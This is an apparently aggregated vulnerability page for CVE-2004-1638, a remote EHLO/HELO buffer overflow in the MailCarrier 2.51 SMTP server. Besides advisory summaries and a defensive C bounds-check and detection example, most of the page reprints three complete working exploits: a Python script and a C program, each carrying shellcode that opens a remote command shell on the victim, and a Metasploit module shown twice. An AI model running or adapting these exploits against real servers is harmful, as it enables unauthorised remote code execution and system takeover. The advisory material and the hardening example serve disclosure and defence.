CVE-2004-1638
CVSS 7.5
Published: 2004-10-16 00:00:00
Last modified: 2016-10-17 22:58:10

[Original] Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.


[CNNVD] MailCarrier SMTP Server Remote Buffer Overflow Vulnerability (CNNVD-200410-022)

        
        MailCarrier SMTP server is a fully featured SMTP server program.
        MailCarrier SMTP server handles the EHLO/HELO commands incorrectly; a remote attacker can exploit this to overflow a buffer in the service process and possibly execute arbitrary instructions with the privileges of that process.
        Submitting an EHLO/HELO command with an overlong argument triggers the buffer overflow; carefully constructed data may execute arbitrary instructions with the privileges of the process.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1638
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1638
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-022
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109880961630050&w=2
(UNKNOWN)  BUGTRAQ  20041026 MailCarrier 2.51 SMTP server Buffer Overflow [PoC included]
http://www.securityfocus.com/bid/11535
(VENDOR_ADVISORY)  BID  11535
http://xforce.iss.net/xforce/xfdb/17861
(VENDOR_ADVISORY)  XF  mailcarrier-ehlo-helo-bo(17861)

- Vulnerability information

MailCarrier SMTP Server Remote Buffer Overflow Vulnerability
High severity  Boundary condition error
2004-10-16 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patch:
        TABS LABORATORIES
        -----------------
        The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        
        http://www.tabslab.com/en/product/mailcarrier20/

- Vulnerability information (598)

MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit (EDBID:598)
windows remote
2004-10-26 Verified
25 muts
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow 	#
# Advanced, secure and easy to use FTP Server. 	    	#
# 23 Oct 2004 - muts                                	#
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py                       	#
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101			#
# localhost [127.0.0.1] 101 (hostname) open		#
# Microsoft Windows 2000 [Version 5.00.2195]		#
# (C) Copyright 1985-2000 Microsoft Corp.		#
# C:\WINNT\system32>					#
#########################################################

import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n" 
print "\n\n###############################################"

def make_overflow_dummy(overflow_len, retaddr):
    return 'A' * overflow_len + struct.pack('<L', retaddr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"

# Change RET address as need be.

#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2  #RET WinXP SP2 ENG

try:
	print "\nSending evil buffer..."
	s.connect(('127.0.0.1',25))
	s.send('EHLO ' + buffer + '\r\n')
	data = s.recv(1024)
	s.close()
	print "\nDone! Try connecting to port 101 on victim machine."
except:
	print "Could not connect to SMTP!"

# milw0rm.com [2004-10-26]
		

- Vulnerability information (637)

MailCarrier 2.51 Remote Buffer Overflow Exploit (EDBID:637)
windows remote
2004-11-16 Verified
25 NoPh0BiA
N/A
/* Remote exploit for MailCarrier by NoPh0BiA,

no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>       /* read, write, close, sleep */
#include <sys/socket.h>
#include <sys/select.h>   /* select, fd_set */
#include <sys/types.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_addr */
#include <errno.h>

#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/

char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x81"
"\x59\x47\x83\xeb\xfc\xe2\xf4\xb1\x69\x0f\x47\x4d\x81\x0a\x12\x1b"
"\xd6\xd2\x2b\x69\x99\xd2\x02\x71\x0a\x0d\x42\x35\x80\xb3\xcc\x07"
"\x99\xd2\x1d\x6d\x80\xb2\xa4\x7f\xc8\xd2\x73\xc6\x80\xb7\x76\xb2"
"\x7d\x68\x87\xe1\xb9\xb9\x33\x4a\x40\x96\x4a\x4c\x46\xb2\xb5\x76"
"\xfd\x7d\x53\x38\x60\xd2\x1d\x69\x80\xb2\x21\xc6\x8d\x12\xcc\x17"
"\x9d\x58\xac\xc6\x85\xd2\x46\xa5\x6a\x5b\x76\x8d\xde\x07\x1a\x16"
"\x43\x51\x47\x13\xeb\x69\x1e\x29\x0a\x40\xcc\x16\x8d\xd2\x1c\x51"
"\x0a\x42\xcc\x16\x89\x0a\x2f\xc3\xcf\x57\xab\xb2\x57\xd0\x80\xcc"
"\x6d\x59\x46\x4d\x81\x0e\x11\x1e\x08\xbc\xaf\x6a\x81\x59\x47\xdd"
"\x80\x59\x47\xfb\x98\x41\xa0\xe9\x98\x29\xae\xa8\xc8\xdf\x0e\xe9"
"\x9b\x29\x80\xe9\x2c\x77\xae\x94\x88\xac\xea\x86\x6c\xa5\x7c\x1a"
"\xd2\x6b\x18\x7e\xb3\x59\x1c\xc0\xca\x79\x16\xb2\x56\xd0\x98\xc4"
"\x42\xd4\x32\x59\xeb\x5e\x1e\x1c\xd2\xa6\x73\xc2\x7e\x0c\x43\x14"
"\x08\x5d\xc9\xaf\x73\x72\x60\x19\x7e\x6e\xb8\x18\xb1\x68\x87\x1d"
"\xd1\x09\x17\x0d\xd1\x19\x17\xb2\xd4\x75\xce\x8a\xb0\x82\x14\x1e"
"\xe9\x5b\x47\x37\xe8\xd0\xa7\x27\x91\x09\x10\xb2\xd4\x7d\x14\x1a"
"\x7e\x0c\x6f\x1e\xd5\x0e\xb8\x18\xa1\xd0\x80\x25\xc2\x14\x03\x4d"
"\x08\xba\xc0\xb7\xb0\x99\xca\x31\xa5\xf5\x2d\x58\xd8\xaa\xec\xca"
"\x7b\xda\xab\x19\x47\x1d\x63\x5d\xc5\x3f\x80\x09\xa5\x65\x46\x4c"
"\x08\x25\x63\x05\x08\x25\x63\x01\x08\x25\x63\x1d\x0c\x1d\x63\x5d"
"\xd5\x09\x16\x1c\xd0\x18\x16\x04\xd0\x08\x14\x1c\x7e\x2c\x47\x25"
"\xf3\xa7\xf4\x5b\x7e\x0c\x43\xb2\x51\xd0\xa1\xb2\xf4\x59\x2f\xe0"
"\x58\x5c\x89\xb2\xd4\x5d\xce\x8e\xeb\xa6\xb8\x7b\x7e\x8a\xb8\x38"
"\x81\x31\xb7\xc7\x85\x06\xb8\x18\x85\x68\x9c\x1e\x7e\x89\x47";


struct sockaddr_in hrm,lar;

void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024];
 int n;
 
 while(1) {
  FD_ZERO(&fd_read);  /* the fd_set must be cleared before each select() call */
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);
 
  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
 
  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }
 
  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}
int conn(char *ip,int port)
{
	int sockfd;
	hrm.sin_family = AF_INET;
	hrm.sin_port = htons(port);
	hrm.sin_addr.s_addr = inet_addr(ip);
	bzero(&(hrm.sin_zero),8);
	sockfd = socket(AF_INET,SOCK_STREAM,0);
	if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
	{
	perror("connect");
	exit(0);
	}
	printf("[x] Connected to: %s PORT: %d\n",ip,port);
	return sockfd;
}

int main(int argc, char *argv[])
{
	char *buffer = malloc(5530),*crap = malloc(32),*t;
	int x,y;
	if(argc<2)
	{
	printf("Usage: TargetIP.\n");
	exit(0);
	}
	printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
	t=argv[1];
	memset(buffer,'\0',5530);
	memset(crap,0x41,32);
	memset(buffer,0x90,5095);
	strcat(buffer,RET);
	strcat(buffer,crap);
	strcat(buffer,shellcode);
	x = conn(t,PORT);
	printf("[x] Sending evil buffer..");
	sleep(3);
	write(x,"EHLO ",5);
	sleep(1);
	write(x,buffer,5530);
	write(x,"\r\n\r\n",4);
	sleep(2);
	close(x);
	printf("done.\n");
	printf("[x] Trying to connect to port 31337..\n");
	y = conn(t,RPORT);
	printf("[x] 0wn3d!\n");
	printf("\r\n");
	shell(y);
		
}

// milw0rm.com [2004-11-16]
		

- Vulnerability information (16822)

TABS MailCarrier v2.51 SMTP EHLO Overflow (EDBID:16822)
windows remote
2010-04-30 Verified
25 metasploit
N/A
##
# $Id: mailcarrier_smtp_ehlo.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
			'Description'	=> %q{
					This module exploits the MailCarrier v2.51 suite SMTP service.
				The stack is overwritten when sending an overly long EHLO command.
			},
			'Author' 	    => [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9179 $',
			'References'    =>
			[
				[ 'CVE', '2004-1638' ],
				[ 'OSVDB', '11174' ],
				[ 'BID', '11535' ],
				[ 'URL', 'http://milw0rm.com/exploits/598' ],
			],
			'Platform'      => ['win'],
			'Arch'		    => [ ARCH_X86 ],
			'Privileged'		=> true,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload' =>
				{
					'Space'			=> 300,
					'BadChars' 		=> "\x00\x0a\x0d:",
					'StackAdjustment'	=> -3500,
				},
			'Targets' =>
				[
					# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
					[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1
					[ 'Windows XP SP2 - EN', 		  { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
				],
			'DisclosureDate' => 'Oct 26 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(25),
				Opt::LHOST(), # Required for stack offset
			], self.class)
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /ESMTP TABS Mail Server for Windows NT/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
		sploit << [target['Ret']].pack('V') + payload.encoded

		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
		

- Vulnerability information (F83004)

TABS MailCarrier v2.51 SMTP EHLO Overflow (PacketStormID:F83004)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit
CVE-2004-1638

This Metasploit module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
			'Description'	=> %q{
            		This module exploits the MailCarrier v2.51 suite SMTP service.
			The stack is overwritten when sending an overly long EHLO command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2004-1638' ],
				[ 'OSVDB', '11174' ],
				[ 'BID', '11535' ],
				[ 'URL', 'http://milw0rm.com/exploits/598' ],
			],         
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'			=> 300,
					'BadChars' 		=> "\x00\x0a\x0d:",
					'StackAdjustment'	=> -3500,
				},
			'Platform' => ['win'],
			'Targets' =>
			[
				# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
				[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1
				[ 'Windows XP SP2 - EN', 		  { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
			],
			'DisclosureDate' => 'Oct 26 2004',
			'DefaultTarget' => 0))
            
		register_options(
			[
				Opt::RPORT(25),
				Opt::LHOST(), # Required for stack offset
			], self.class)
	end

	def check 
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /ESMTP TABS Mail Server for Windows NT/)
			return Exploit::CheckCode::Appears 
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
		sploit << [target['Ret']].pack('V') + payload.encoded
		
		sock.put(sploit + "\r\n")
		
		handler
		disconnect
	end

end
    

- Vulnerability information

11174
MailCarrier HELO/EHLO Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- Vulnerability description

A remote overflow exists in MailCarrier. The server fails to properly check bounds on HELO and EHLO commands, resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code with the privileges of the running daemon.
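The descriptions above (the CNNVD abstract and this OSVDB entry) both reduce the bug to one missing step: the server copies the HELO/EHLO argument without comparing its length to the buffer that receives it. The following C is an added example, not code from the page, from TABS Laboratories, or from any of the exploit authors listed here. It shows the bounds check a hardened SMTP greeting handler performs, and the same bound used as a detection rule over a captured session. It assumes the RFC 5321 limits (512 octets per command line including CRLF, 255 octets for the EHLO/HELO domain) as the values to enforce; all function names and the sample session lines are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* RFC 5321 limits, assumed here as the bound to enforce: a command line is at
 * most 512 octets including CRLF; the EHLO/HELO argument at most 255 octets. */
#define SMTP_MAX_LINE   512
#define SMTP_MAX_DOMAIN 255

/* Verdicts returned by the handler, mirroring SMTP reply codes. */
enum smtp_verdict {
    SMTP_OK            = 250,
    SMTP_LINE_TOO_LONG = 500,  /* whole command line over the 512-octet bound */
    SMTP_BAD_ARGUMENT  = 501   /* missing, overlong or otherwise unusable argument */
};

/* Case-insensitive test for a leading "EHLO " or "HELO " (SMTP verbs are
 * case-insensitive). Hypothetical helper written for this example. */
static int has_hello_verb(const char *l)
{
    if (strlen(l) < 5 || l[4] != ' ')
        return 0;
    char v[5];
    for (int i = 0; i < 4; i++)
        v[i] = (char)toupper((unsigned char)l[i]);
    v[4] = '\0';
    return strcmp(v, "EHLO") == 0 || strcmp(v, "HELO") == 0;
}

/* Hardened greeting handler: checks the line length and the argument length
 * before copying anything into the fixed-size client_name buffer. The
 * unchecked pattern behind this bug class copies the argument into a stack
 * buffer without ever comparing its length to the buffer's capacity. */
enum smtp_verdict handle_hello(const char *line, char *client_name, size_t name_cap)
{
    if (strlen(line) > SMTP_MAX_LINE)
        return SMTP_LINE_TOO_LONG;
    if (!has_hello_verb(line))
        return SMTP_BAD_ARGUMENT;

    const char *arg = line + 5;
    size_t alen = strcspn(arg, "\r\n");            /* argument runs up to CRLF */
    if (alen == 0 || alen > SMTP_MAX_DOMAIN || alen >= name_cap)
        return SMTP_BAD_ARGUMENT;

    memcpy(client_name, arg, alen);                /* bounded: alen < name_cap */
    client_name[alen] = '\0';
    return SMTP_OK;
}

/* Builds "EHLO " + arg_len bytes of 'A' + CRLF into out (constructed test
 * input only). Returns 0 on success, -1 if out cannot hold the line. */
int make_hello_line(char *out, size_t cap, size_t arg_len)
{
    if (arg_len + 5 + 2 + 1 > cap)
        return -1;
    memcpy(out, "EHLO ", 5);
    memset(out + 5, 'A', arg_len);
    memcpy(out + 5 + arg_len, "\r\n", 3);          /* copies the NUL as well */
    return 0;
}

/* Detection view of the same bound: counts HELO/EHLO lines in a captured
 * session whose argument exceeds SMTP_MAX_DOMAIN, e.g. over a proxy or IDS
 * transcript of port-25 traffic. */
int count_oversized_hello(const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (!has_hello_verb(lines[i]))
            continue;
        if (strcspn(lines[i] + 5, "\r\n") > SMTP_MAX_DOMAIN)
            hits++;
    }
    return hits;
}

int main(void)
{
    char name[SMTP_MAX_DOMAIN + 1];
    char big[6000];

    /* Constructed, well-formed greeting: accepted. */
    printf("normal EHLO -> %d\n", handle_hello("EHLO mail.example.test\r\n", name, sizeof name));

    /* Constructed greeting at roughly the length the exploits on this page send
     * (about 5100 bytes): rejected before any copy takes place. */
    make_hello_line(big, sizeof big, 5106);
    printf("5106-byte EHLO -> %d\n", handle_hello(big, name, sizeof name));

    /* Constructed session transcript for the detection view. */
    const char *session[] = {
        "220 mail.example.test ESMTP\r\n",
        "EHLO client.example.test\r\n",
        big,
        "QUIT\r\n",
    };
    printf("oversized HELO/EHLO lines: %d\n", count_oversized_hello(session, 4));
    return 0;
}
```

The handler rejects on two independent limits because they catch different inputs: a 300-byte domain fits inside a 512-byte line and passes the first check, so the per-argument bound is what keeps it out of the 256-byte buffer. The detection function applies only the argument bound, which is enough to flag the lengths used in the exploits on this page while leaving ordinary greetings alone.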

- Timeline

2004-10-26 Unknown
2004-10-26 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

 

 
